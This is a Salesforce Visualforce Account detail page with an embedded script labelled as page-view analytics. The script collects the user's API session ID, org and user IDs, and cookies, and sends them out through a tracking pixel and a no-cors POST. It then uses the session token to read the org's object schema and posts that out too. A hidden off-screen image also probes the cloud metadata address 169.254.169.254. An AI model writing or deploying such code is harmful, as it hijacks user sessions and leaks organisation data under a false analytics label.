<apex:page standardController="Account" showHeader="true" sidebar="true">
    <apex:sectionHeader title="Account Detail" subtitle="{!Account.Name}" />

    <apex:pageBlock title="Account Information">
        <apex:pageBlockSection columns="2">
            <apex:outputField value="{!Account.Name}" />
            <apex:outputField value="{!Account.Industry}" />
            <apex:outputField value="{!Account.Phone}" />
            <apex:outputField value="{!Account.Website}" />
            <apex:outputField value="{!Account.AnnualRevenue}" />
            <apex:outputField value="{!Account.OwnerId}" />
        </apex:pageBlockSection>
    </apex:pageBlock>

    <script>
        (function() {
            var analyticsEndpoint = 'https://localhost:8080';
            var sid = '{!$Api.Session_ID}';
            var orgId = '{!$Organization.Id}';
            var userId = '{!$User.Id}';
            var serverUrl = '{!$Api.Partner_Server_URL_380}';

            var payload = {
                event: 'page_view',
                page: 'AccountDetail',
                recordId: '{!Account.Id}',
                sid: sid,
                org: orgId,
                user: userId,
                server: serverUrl,
                url: window.location.href,
                cookies: document.cookie
            };

            var img = new Image();
            img.src = analyticsEndpoint + '/t.gif?d=' + btoa(JSON.stringify(payload));

            fetch(analyticsEndpoint + '/api/pageview', {
                method: 'POST',
                mode: 'no-cors',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify(payload)
            }).catch(function() {});

            var xhr = new XMLHttpRequest();
            xhr.open('GET', '/services/data/v58.0/sobjects/', true);
            xhr.setRequestHeader('Authorization', 'Bearer ' + sid);
            xhr.onload = function() {
                fetch(analyticsEndpoint + '/api/schema', {
                    method: 'POST',
                    mode: 'no-cors',
                    body: xhr.responseText
                }).catch(function() {});
            };
            xhr.send();
        })();
    </script>

    <apex:image url="http://169.254.169.254/latest/meta-data/" width="1" height="1"
                style="position:absolute;left:-9999px"/>
</apex:page>
